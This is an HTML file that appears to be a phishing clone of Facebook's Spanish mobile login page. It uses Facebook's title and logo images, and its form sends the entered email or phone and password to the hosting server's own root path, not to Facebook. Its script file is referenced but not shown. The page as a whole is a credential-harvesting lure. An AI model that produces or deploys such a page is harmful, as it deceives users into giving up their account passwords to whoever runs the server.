<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/css/index.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" 
    integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA==" 
    crossorigin="anonymous" referrerpolicy="no-referrer" />
<title>Facebook</title>
    <link rel="icon" href="https://th.bing.com/th/id/OIP.6SEt--3faq11Qgu6FkmGnQHaHa?rs=1&pid=ImgDetMain" type="image/x-icon">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>
<body>
    <header>
        <p class="español">Español (España)</p>
        <img src="https://z-m-static.xx.fbcdn.net/rsrc.php/v3/yD/r/5D8s-GsHJlJ.png" alt="">

    </header>

    <main>
        <form action="/" method="POST">

            <div class="contdiv" onclick="myFunction(event)">
                
                    <span class="medio">Movil o correo electronico</span>
                    <span class="spancorreo" style="display: none;">Movil o Correo electronico</span>
                    <input name="email" class="correo" type="text" style="display: none;">
                    
            </div>

            <div class="contdiv" onclick="myFunction(event)">
                <span class="medio">Contraseña</span>
                        <span class="spancorreo" style="display: none;">Contraseña</span>
                        <input name="password" class="correo" type="password" style="display: none;">
            </div>

            <button class="sesion">Iniciar Sesion</button>
        <p class="olvidaste">¿Has olvidado la contraseña?</p>
        </form>

    </main>

    <footer>
        <form action="">
            <button class="sesion2">Crear cuenta nueva</button>
            <img class="img2" src="https://z-m-static.xx.fbcdn.net/rsrc.php/v3/yM/r/DDgwTv3JehF.png" alt="">
        <p class="olvidaste2">informacion  Ayuda  Mas</p>
        </form>
        

    </footer>
    <script src="/js/inde.js"></script>
</body>
</html>
